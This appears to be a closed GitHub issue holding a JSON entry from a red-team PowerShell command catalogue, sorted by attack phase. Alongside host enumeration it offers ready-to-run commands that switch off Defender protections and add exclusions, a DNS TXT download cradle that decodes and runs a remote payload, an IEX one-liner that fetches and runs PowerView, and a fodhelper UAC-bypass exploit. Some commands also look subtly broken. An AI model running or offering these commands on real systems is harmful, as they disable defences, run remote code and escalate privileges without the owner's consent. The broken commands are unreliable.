Closed Patrick-DE closed 4 days ago
{ "name": "PowerShell", "phases": [ "01. Initial Access", "03. Host Enumeration", "04. Persistence", "05. Privilege Escalation", "07. Lateral Movement" ], "category": "", "stealthy": false, "platforms": [ "Windows" ], "source": "https://learn.microsoft.com/de-de/powershell/?view=powershell-7.3", "description": "PowerShell", "undetected": [], "detected": [], "content": "\n\n## [[LSA Protection]]\n`Get-WinEvent -FilterHashtable @{ LogName='system'; Id='12' ; ProviderName='Microsoft-Windows-Wininit' }`\n\n## [[RDP]]\n`Get-WinEvent -FilterHashtable @{ LogName='Microsoft-Windows-TerminalServices-RDPClient/Operational'; id='1024' } | select timecreated, message | ft -AutoSize -Wrap`\n\n## [[COM Hijacking]]\nList COM objects\n`gwmi Win32_COMSetting | ? {$_.progid } | sort | ft ProgId,Caption,InprocServer32`\n\nList COM Object Methods for WScript.Shell.1\n`$o = [activator]::CreateInstance([type]::GetTypeFromProgID((\"WScript.Shell.1\"))) | gm`\n\n## [[Unquoted Service Path]]\nGet ACLs of services\n```ps\npowershell Get-Acl -Path \"C:\\Program Files\\Vuln Services\" | fl\n \nPath : Microsoft.PowerShell.Core\\FileSystem::C:\\Program Files\\Vuln Services\nOwner : BUILTIN\\Administrators\nGroup : wkstn1\\None\nAccess : CREATOR OWNER Allow FullControl\n NT AUTHORITY\\SYSTEM Allow FullControl\n BUILTIN\\Administrators Allow FullControl\n BUILTIN\\Users Allow Write, ReadAndExecute, Synchronize\n NT SERVICE\\TrustedInstaller Allow FullControl\n APPLICATION PACKAGE AUTHORITY\\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize\n APPLICATION PACKAGE AUTHORITY\\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize\n```\n\n## [[Common Language Runtime (CLR) Versions]]\n```ps\ndir %WINDIR%\\Microsoft.Net\\Framework\\ /s /b | find \"System.dll\"\n\n[System.IO.File]::Exists(\"$env:windir\\Microsoft.Net\\Framework\\v2.0.50727\\System.dll\")\n\n[System.IO.File]::Exists(\"$env:windir\\Microsoft.Net\\Framework\\v4.0.30319 System.dll\")\n```\n\n", "commands": [ { "id": "6183749c-eee5-42ca-a171-ac1b1a35a449", "name": "Check LSA Protection", "description": "", "tag": "", "results": [], "cmd": "Get-WinEvent -FilterHashtable @{ LogName='system'; Id='12' ; ProviderName='Microsoft-Windows-Wininit' }" }, { "id": "a7a1f9d8-ead2-4ef3-a773-1bda67790647", "name": "Decode Base64", "description": "", "tag": "", "results": [], "cmd": "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($str))" }, { "id": "a8516fd7-ce4f-4c19-97c9-780aa299f594", "name": "Disable Defender", "description": "", "tag": "", "results": [], "references": [ "https://github.com/evilmog/evilmog/wiki/DNS-Download-Cradle" ], "cmd": "Set-MpPreference -DisableRealtimeMonitoring $true\nSet-MpPreference -DisableBehaviorMonitoring $true\nSet-MpPreference -DisableScriptScanning $true\nSet-MpPreference -DisableArchiveScanning $true", "requirements": { "tag": "PRIVS:ADMIN" } }, { "id": "3949f2c6-7e9a-4b65-91c4-657ef1766dce", "name": "Download cradle via TXT DNS records", "description": "", "tag": "", "results": [], "cmd": "$a='';$n=1..2;ForEach ($i in $n) { $a += ((resolve-dnsname -type txt $mydomain.org).strings) }; iex((System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($a))))" }, { "id": "d246dc40-5194-4f1e-a4ca-208827e49e36", "name": "Encode Base64", "description": "", "tag": "", "results": [], "cmd": "[System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($str))" }, { "id": "48b78655-db1f-4da0-9d31-f90cc810eb3e", "name": "Get ACLs of services", "description": "", "tag": "", "results": [], "cmd": "powershell Get-Acl -Path \"C:\\Program Files\\Vuln Services\" | fl" }, { "id": "bf3b2a29-c697-4835-aadd-02cf9a14dcbc", "name": "Get all COM objects via wmi", "description": "A lot of output", "tag": "", "results": [], "cmd": "gwmi Win32_COMSetting | ? {$_.progid } | sort | ft ProgId,Caption,InprocServer32" }, { "id": "5c9766c7-293d-4110-bfeb-0aabfd061080", "name": "Get CLR versions", "description": "Get Common Language Runtime (CLR) versions", "tag": "", "results": [], "cmd": "cmd.exe /c dir %WINDIR%\\Microsoft.Net\\Framework\\ /s /b | find \"System.dll\"\n\n[System.IO.File]::Exists(\"$env:windir\\Microsoft.Net\\Framework\\v2.0.50727\\System.dll\")\n[System.IO.File]::Exists(\"$env:windir\\Microsoft.Net\\Framework\\v4.0.30319 System.dll\")" }, { "id": "52121667-91db-4042-910a-ae02121b82f3", "name": "Get Defender Detections", "description": "", "tag": "", "results": [], "cmd": "Get-MpThreatDetection" }, { "id": "c6a72c8f-0734-4a95-9dfd-241ac41591b5", "name": "Get Defender Exclusions", "description": "", "tag": "", "results": [], "cmd": "Get-MpPreference | Select-Object -ExpandProperty ExclusionPath", "requirements": { "tag": "PRIVS:ADMIN" } }, { "id": "4e5c3ef8-0775-4d8e-af57-a82dc066e524", "name": "Get Defender Status", "description": "", "tag": "", "results": [], "cmd": "Get-MpComputerStatus\nGet-MpPreference" }, { "id": "3c5b88d5-05d2-43bd-912a-d7025e4751f0", "name": "Get Imported Modules", "description": "", "tag": "", "results": [], "cmd": "Get-Module -All" }, { "id": "94a5526d-cdc0-47e9-afd7-a14881beffe1", "name": "Get latest MDE Detection", "description": "", "tag": "", "results": [], "cmd": "Get-MpThreatDetection |sort $_.InitialDetectionTime |select -First 1" }, { "id": "e6685b82-4fa3-4591-bc80-732a64a8cc28", "name": "Get methods of COM object ", "description": "List COM Object Methods for WScript.Shell.1", "tag": "", "results": [], "cmd": "[activator]::CreateInstance([type]::GetTypeFromProgID((\"WScript.Shell.1\"))) | gm" }, { "id": "36c7d31c-865d-4e71-83fe-cd41b3560f42", "name": "Get MSSQL Servers", "description": "", "tag": "", "results": [], "cmd": "ADForestInfoRootDomain = ([System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest()).RootDomain\n$ADForestInfoRootDomainDN = \"DC=\" + $ADForestInfoRootDomain -Replace(\"\\.\",',DC=')\n$ADDomainInfoLGCDN = 'GC://' + $ADForestInfoRootDomainDN\n$root = [ADSI]$ADDomainInfoLGCDN\n$ADSPNSearcher = new-Object System.DirectoryServices.DirectorySearcher($root,\"(serviceprincipalname=*sql*)\")\n$ADSPNSearcher.PageSize = 500\n$AllADSQLServerSPNs = $ADSPNSearcher.FindAll()" }, { "id": "cc43d2fa-b951-4f09-b37f-91f34ea5bbaf", "name": "Get RDP Events", "description": "", "tag": "", "results": [], "cmd": "Get-WinEvent -FilterHashtable @{ LogName='Microsoft-Windows-TerminalServices-RDPClient/Operational'; id='1024' } | select timecreated, message | ft -AutoSize -Wrap" }, { "id": "cfdc1559-6498-40c2-8bbe-e200e7a47ec1", "name": "Get Registry Entry", "description": "With the example of AppLocker and WDAC", "tag": "", "results": [], "cmd": "#APPLOCKER\nGet-ChildItem -Path 'HKLM:\\Software\\Policies\\Microsoft\\Windows\\SRPV2'\nGet-ChildItem -Path 'HKLM:\\System\\CurrentControlSet\\Control\\SRP\\GP'\nGet-ChildItem -Path \n#WDAC\n'HKLM:\\SOFTWARE\\Policies\\Microsoft\\Windows\\DeviceGuard -v DeployConfigCIPolicy'\nGet-ChildItem -Path 'HKLM:\\SOFTWARE\\Policies\\Microsoft\\Windows\\DeviceGuard -v ConfigCIPolicyFilePath'" }, { "id": "7dc8490f-8454-4d39-83d5-43bcda1bc27c", "name": "Launch C# via PowerShell", "description": "", "tag": "", "results": [], "cmd": "$id = get-random\n$assemblies = (\"System.Core\",\"System.Xml.Linq\",\"System.Data\",\"System.Xml\", \"System.Data.DataSetExtensions\", \"Microsoft.CSharp\")\nAdd-Type -ReferencedAssemblies $assemblies -TypeDefinition $code -Language CSharp\n$code = @\"\nusing System;\nnamespace HelloWorld\n{\n\tpublic class Program$id\n\t{\n\t\tpublic static void Main(){\n\t\t\tConsole.WriteLine(\"Hello world!\");\n\t\t}\n\t}\n}\n\"@\n \nAdd-Type -TypeDefinition $code -Language CSharp\t\niex \"[HelloWorld.Program$id]::Main()\"" }, { "id": "7e1ff5f3-6e68-405c-81b5-64bba180e491", "name": "Load Github Script Remotely", "description": "Showed with an example of PowerView", "tag": "", "results": [], "cmd": "IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1'); Find-GPOLocation -UserName Administrator;" }, { "id": "91dc7ca7-51e5-414f-a6c7-37094cfa60e5", "name": "PS-Remoting", "description": "", "tag": "", "results": [], "cmd": "Invoke-Command -ComputerName Test1-Win2k16 -ScriptBlock{Get-LocalGroupMember -Name 'Administrators'}", "requirements": { "tag": "SERVICE:WINRM" } }, { "id": "eb9dc6fa-f509-41ab-ab5c-33653b431bc4", "name": "Set Defender Exclusions", "description": "", "tag": "", "results": [], "cmd": "Set-MpPreference -ExclusionPath PATH\\TO\\FOLDER\nSet-MpPreference -ExclusionExtension docx\nSet-MpPreference -ExclusionProcess Process", "requirements": { "tag": "PRIVS:ADMIN" } }, { "id": "0b63dd81-e89a-4934-b625-4ab767e81149", "name": "Trigger WSUS", "description": "", "tag": "", "results": [], "cmd": "$updateSession = New-Object -com \"Microsoft.Update.Session\"; $updates=$updateSession.CreateupdateSearcher().Search($criteria).Updates; wuauclt.exe /reportnow" }, { "id": "a95c3c48-e767-4086-83b8-aac0e7883300", "name": "Exploit Fodhelper", "description": "", "tag": "", "results": [ "EXPLOITS:FODHELPER" ], "cmd": "New-Item -Path HKCU:\\Software\\Classes\\mssettings\\shell\\open\\command -Value powershell.exe –Force\nNew-ItemProperty -Path HKCU:\\Software\\Classes\\mssettings\\shell\\open\\command -Name DelegateExecute -PropertyType String -Force\nC:\\Windows\\System32\\fodhelper.exe" } ] }
Patrick-DE
commented
11 months ago Patrick-DE
commented
11 months ago